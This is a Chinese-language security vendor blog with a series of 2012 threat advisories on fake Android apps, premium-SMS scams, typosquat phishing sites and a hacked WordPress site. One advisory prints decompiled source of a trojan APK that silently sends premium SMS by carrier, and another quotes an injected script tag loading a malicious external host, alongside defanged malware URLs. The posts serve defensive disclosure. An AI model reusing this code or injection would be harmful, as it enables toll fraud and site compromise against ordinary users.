[ 安全通報 ] 31 七月, 2012 17:25

    倫敦奧運正在舉行,奧運官網也提供一些 APP 給人家下載(圖1),駭客當然也不會放過這個機會。AegisLab 近來就發現幾個俄羅斯的 Android Markets 就出現假的奧運遊戲供人下載,目的還是發送付費簡訊(很老套了吧...)。還是老話一句,不要在非官方 Android Market 或是不信任的網站上下載 APP。

惡意的 Android Markets:

  • igry-for-android.ru (圖2)
  • samsungs5570.ru (圖3)
以下是從這兩個俄羅斯網站下載的部分 apps 在 VirusTotal 偵測的結果:(括弧是偵測率)

 

圖1:官方遊戲可在 Google Play 和 Apple App Store上面找到

 

圖2:假的奧運遊戲

 

圖3:假的奧運遊戲

 

by AegisLab 

[ 安全通報 ] 30 七月, 2012 15:00

    上週 AegisLab 發現一個奇怪的 domain name:hxxp://adobe-upgrade.org/w.php?f=28f52,看起來像不像 Adobe 的官方 domain name ?!實際上一點也不是,這只是駭客註冊的,目的就是誘騙無辜的人下載惡意程式。經過分析後,發現這是一個 Fake AV 程式,安裝完畢會顯示病毒掃瞄畫面(圖1),掃瞄顯示的檔案並不存在 VM 中,而且掃完之後電腦就會真的中毒了!

   VirusTotal 詳細資料: 

SHA256: e69d29b7b09449e64474b0caed08461f527b9ce1577f95f4ef3409e7424d5e36
SHA1: b0742f1f07e30620d0643029375786873d897177
MD5: 4c57cf16bbe1e1f5e8e38b3773f5e07a
File size: 404.0 KB ( 413696 bytes )
File name: about.exe
File type: Win32 EXE
Tags: peexe armadillo
Detection ratio: 7 / 41
Analysis date: 2012-07-23 05:55:56 UTC 

 

圖1: 假的掃毒畫面

 

by AegisLab 

[ 安全通報 ] 27 七月, 2012 15:13

    AegisLab 今日發現有個惡意連結指向線上遊戲廠商「紅心辣椒」的網站,下載的檔案為病毒檔,且網路上已有人受害(圖2)。

  • hxxp://patchsd.wasabii.com.tw/LuncherUpdater.ex

VirusTotal 的詳細資訊如下: 

SHA256: a93c92d71042fe34415759b15392afc41ce59248992973e65cb9904ba7195c88
SHA1: 9ffa6e12a42e23c3a41e59565f828032f218a5e3
MD5: 38619226c3f6ce0b0b01067b05130611
File size: 80.0 KB ( 81920 bytes )
File name: LuncherUpdater.ex
File type: Win32 EXE
Detection ratio: 23 / 41
Analysis date: 2012-07-27 07:05:30 UTC ( 1 分鐘 ago )

 

圖1:紅心辣椒官網

 

圖2:災情傳出

(出處:http://forum.gamer.com.tw/C.php?page=1&bsn=09106&snA=91187

 

不管是官方程式遭感染或是網站遭植入惡意程式,請紅心辣椒官方應該儘速移除此檔,避免病毒繼續散佈。 

 

By AegisLab 

[ 安全通報 ] 26 七月, 2012 14:31

    AegisLab 近來在俄羅斯的非官方 Android Market 發現一個 Adobe Flash Player 程式,其實它是FakeInst (也可能稱為 OpFake, SMSSend 或是 TrojanSMS)的變種,這隻程式的目的很簡單,就是要發付費簡訊,以下是 VirusTotal 的偵測率報告,只有兩家偵測到,當然我們的 AegisLab Antivirus 也可以偵測到。

經過複雜的交叉分析,我們發現以下的幾個 Android Market (或網站) 都是有問題的,彼此之間存在著 hyper link 的關係,網站存在大量惡意的 apk (也有少數正常的):
  • androidmir.com 和 android-mir.com (圖1)
  • myadroidmaklet.net (圖2)
  • filedats.net (圖3)
  • file77mibi.net
  • androidmarkt.ru

圖1: androidmir.com

 

圖2: myadroidmaklet.net

 

圖3: filedats.net

 

其實這一切都要從 AegisLab 的 WebGuard Team開始說起,當研究人員在網路巡邏時,發現 Cool Reader 程式下載的 link,原來它偽裝成正常程式騙你下載,而安裝完後還會發出緊急更新通知,其實又是騙你下載另一個程式,而整個程式執行過程如下圖所示:

圖 4: Cool Reader

 

圖 5: 假的安裝畫面

 

圖 6: 假的同意條款(注意左上角有更新通知)

 

圖 7: 叫你連上某個網站去下載程式

 

圖 8: 假的登入畫面(按Enter即可進入)

 

圖 9: 紅圈處叫你下載 http://androidmir.com/download/cr3-0-45-07.apk (連結已不存在)

 

圖 10: 剛剛提到的緊急更新通知(叫你更新 Adobe Flash Player)

 

圖 11: 連上 myadroidmaklet.net

 

當假的 Adobe Flash Player 下載安裝時會發現需要讀取/發送 SMS 的權限,也需要讀取 GPS location(圖12,13),正常的 Adobe Flash Player 是不會的。

圖 12,13: 假的 Adobe Flash Player

 

假的 Adobe Flash Player 安裝好後,桌面上會出現 shortcut,點擊之後 又是下載一個 "Browser" 程式(圖14,15) ,也是要求一模一樣的權限(圖16,17) 。

 

圖 14,15: 叫你Update Browser (當然是騙你的)

 

圖 16,17: 假的 Browser

 

總而言之,這些複雜的連結就是想讓你卸下心防,好讓駭客得逞,目的就是傳送付費簡訊。AegisLab 提醒您,非官方的 Android Market 存在很大的風險,千萬要小心 。


By AegisLab 

 

[ 安全通報 ] 24 七月, 2012 18:57

    AegisLab 發現一個俄羅斯網站 "google-file.com" 長的跟 Google 的官方網站很像(圖1)。但實際上它並不是 Google 的官方網站, 只是一個詐騙網站,賺取你傳送付費簡訊的費用。

如果你想下載某個檔案(圖2),它會叫你先輸入電話號碼(圖3),然後下一步驟就是根據不同國家傳送付費簡訊到不同號碼(圖4),美其名是說要驗證身份,但實際上只是要騙取簡訊費用。這種詐騙方式在 android 手機上也很常用,只是android 手機的惡意軟體會偷偷發,在這裡它會騙你發。在俄羅斯的網站上已經可以看到很多關於 Google-File.com的抱怨(圖5),大家都希望能退錢,並且把 Google-File.com 關閉!

 

圖 1: Google-File.com

 

圖 2: 選擇下載檔案

 

 3: 輸入電話號碼

 

 4: 選擇國家並發送付費簡訊

 

 5: 一堆對 google-file.com 的抱怨

 

另外發現 google-fiile.mk3k.ru、google-fille.org、 google-fiile.org 這3個 URL 也是連到此網站,目前 WebGuard 已將這4個網址阻擋。 

 

By AegisLab

 

[ 安全通報 ] 24 七月, 2012 17:14

    AegisLab 近期發現在 Alexa 排名 935,973 的 China HitFM (http://www.hitfm.cn/, http://hitfm.cri.cn) 網站,因為使用有弱點的 WordPress 3.2.1 架站被駭客入侵成功,在首頁(圖1,圖2)最前面插入一行惡意網址:

  •  <script type="text/javascript" src="hxxp://nephis.org.br/wp-content/Check.php"></script>
而被插入的 URL 亦被 Google SafeBrowsing 列為惡意網站清單 (圖3) 
 
圖1: 中國國際廣播電台
 

圖2: 首頁被插入一行惡意網址  

 

圖3:  nephis.org.br 被Google SafeBrowsing 判定為惡意網站  

 

實際連到該網頁發現,它會試圖插入一段內容 if(navigator.javaEnabled()) { document.write(' '); };有趣的是,雖然目前看起來是插入空白字串,但實際上在插入該字串的地方會停頓載入一下,有可能在偵測使用者的資訊,以插入不同的內容。

圖4:準備插入特殊內容

 

其實之前使用 WordPress 3.2.1 的網站就傳出災情了,AegisLab 提醒您要隨時注意架站軟體是否有弱點,隨時要注意更新!

目前這波看來災情還沒傳出,僅有10多個網站受駭(圖5),AegisLab 會密切注意未來的發展並持續更新。

 

圖5:災情尚未擴散

 

By AegisLab

[ 安全通報 ] 20 七月, 2012 13:58

    

    還記得上禮拜提到的「安全通報 2012-07-12: 惡意的「超級瑪莉兄弟」 App 在 Google Play 上架」,第二階段的感染有 download 一個 apk - Activator.apk,今天我們就來分析這個 apk 的行為。

主要的反組譯程式碼如下用紅色標出來: 

----------------------------------------------------------------------- 
package com.activator;

import android.app.Activity;
import android.app.AlertDialog;
import android.app.AlertDialog.Builder;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.TelephonyManager;
import java.util.Random;
import java.util.regex.Pattern;

public class ActivatorActivity extends Activity
{
  TelephonyManager TM;
  AlertDialog.Builder builder;
  String operator;

  private void sendSMS(String paramString1, String paramString2)
  {
    SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);
  }


  protected void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    setContentView(2130903040);
    this.TM = ((TelephonyManager)getSystemService("phone"));
    this.operator = this.TM.getSimOperatorName();
    if (Pattern.matches("[bBeEeE]*", this.operator.substring(0, 3)))
    {
      int k = 1 + new Random().nextInt(10000);
      startProgress("1518", "DEF1773");
      startProgress("3170", "4037" + k);

      setResult(1);
      finish();
    }
    while (true)
    {
      return;
      if (Pattern.matches("[mMtTsS]*", this.operator.substring(0, 3)))
      {
        int j = 1 + new Random().nextInt(10000);
        startProgress("770656", "DEF1773");
        startProgress("3170", "4037" + j);

        setResult(1);
        finish();
        continue;
      }
      if (this.operator.equalsIgnoreCase(""))
      {
        this.builder = new AlertDialog.Builder(this);
        this.builder.setCancelable(false);
        this.builder.setMessage("Ошибка при загрузке базы обоев. Попробуйте позже.");
        this.builder.setNeutralButton("OK", new DialogInterface.OnClickListener()
        {
          public void onClick(DialogInterface paramDialogInterface, int paramInt)
          {
            ActivatorActivity.this.setResult(0);
            ActivatorActivity.this.finish();
          }
        });
        this.builder.create().show();
        continue;
      }
      int i = 1 + new Random().nextInt(10000);
      startProgress("3170", "4037" + i);

      setResult(1);
      finish();
    }
  }

  public void startProgress(String paramString1, String paramString2)
  {

    new Thread(new Runnable(paramString1, paramString2)
    {
      public void run()
      {
        ActivatorActivity.this.sendSMS(this.val$number, this.val$message);
      }
    }).start();
  }
}

-----------------------------------------------------------------------

基本上會以 OperatorName() 來做判斷,根據不同的 OperatorName 來傳送不同的簡訊,規則如下:

operator = OperatorName()
Case1:
Pattern.matches("[bBeEeE]*", operator.substring(0, 3))
number=1518, message="DEF1773"
number=3170, message="4037" + 1~10000任一個數字

Case2:
Pattern.matches("[mMtTsS]*", operator.substring(0, 3))
number=770656, message="DEF1773"
number=3170, message="4037" + 1~10000任一個數字

Case3(上面兩種都沒有match):
只要 operatorName 不為空的就傳送
number=3170, message="4037" + 1~10000任一個數字

如果 operatorName 是空的話,會 SHOW 一個 AlertDialog
訊息如下:
Ошибка при загрузке базы обоев. Попробуйте позже. (google 翻譯 "Failed to load base wallpaper. Please try again later")

因為"Super Mario Bros"是偽裝成 wallpaper app,這段訊息其實就是欺騙你程式沒執行成功而已。


By AegisLab

 

 

[ 安全通報 ] 12 七月, 2012 17:16

    根據 Symantec 和 F-Secure 的報告,有一款偽裝成 Super Mario Bros. 的 App 在 Google Play 上架,看起來像是動作遊戲,但安裝後出現的是 "Mario HD Wallpaper" 圖示(圖2)。目前 Google Play 已經移除該程式, 但 3rd-party market 上還找的到(圖1)。這支程式採用 2-stage 或是 multi-stage infection 的技術,簡單來說就是第一階段的程式通常無害,但安裝好後會連上某個網站下載另一個程式,而這支程式才是有問題的,藉此躲避 Google Play 的審查。

就「超級瑪莉兄弟」這個程式來說,裡面包了三個 link 如下,最後似乎都指向 (http://dl.dropbox.com/u/87265868/Activator.apk)

 

第二階段就是下載 Activator.apk ,安裝完成後會發送付費簡訊(僅針對東歐國家),發送成功後會把自己(Activator) un-install。

圖1: 出現在 3rd-party market

 

圖2: 顯示 Mario HD Wallpaper

 

圖3: 安裝時出現的俄文聲明

 

圖4: 安裝時出現的俄文聲明

  

圖5: AegisLab Antivirus 可偵測到

 

AegisLab 根據作者(developer)找到了 5 個相關程式,目前都可以偵測到。

VirusTotal 部分偵測結果:

 

By AegisLab 

[ 安全通報 ] 12 七月, 2012 13:31

    還記得「安全通報 2012-05-29: 注意 Facebook URL Hijacking 攻擊」提到的 facenook.com 和 facevook.com 這兩個長的跟 facebook.com 很像的網址,這次「全新改版」,連畫面都模仿了 facebook (如圖1)。

圖1: 長的真像 facebook  


一進到這個頁面還有一小段的錄音檔來通知你中獎,其聲音的內容即是頁面上的:
You have been selected to take part in our anonymous survey!
Complete this 30 second questionnaire, and to say "thank you", we'll offer you an exclusive gift.

按下Start後,開始填寫問卷,問題內容如圖2:

圖2: 填寫問卷

 

填寫完問卷後,會跳出2個獎品給你選擇,分別是 Best Buy 及 Walmart 的Gift Card,如圖3:(不用想太多,你拿不到的...)

圖3: 選取禮物

 

選好獎品後,會出現頁面要你輸入cell phone number 和 email address,如圖 4:(這叫被賣了還要幫人數鈔票...)

圖4: 填寫電話號碼和 e-mail address

 

恭喜你完成以上幾個步驟,等到世界末日獎品都不會寄到你手上!

所謂上一次當學一次乖,以後看到這種莫名其妙只要填問卷就送獎品的抽獎頁面一律直接關掉。

 

By AegsiLab 

[ 安全通報 ] 06 七月, 2012 16:25

    Kaspersky Lab 昨天發現一個同時出現在 Google Play 和 Apple App Store 上的 App,叫做 "Find and Call" (圖1)。安裝完成後,如果偵測到有 SIM 卡,它會叫你輸入手機號碼註冊;如果沒有 SIM 卡但有 Wifi,它就會叫你輸入 e-mail address 註冊 (圖2),實際上這些註冊資訊並沒有真正驗證,它的目的只是要收集通訊錄上的聯絡人資訊,進而發佈垃圾、詐騙簡訊。(圖3)即是安裝完成後執行的畫面。

AegisLab Antivirus Scanner 已經可以偵測到這支後門程式 (圖4) ;至於 iOS 版本的用戶則是盡快移除這個 app (雖然資料可能已經洩漏出去了 XD)。

圖1: 安裝完成畫面 

 

 

 圖2: 叫你輸入 e-mail address 註冊 

 

 圖3: Find and Call 程式執行畫面

 

   圖4: AegisLab Antivirus Scanner 偵測到病毒

 

By AegisLab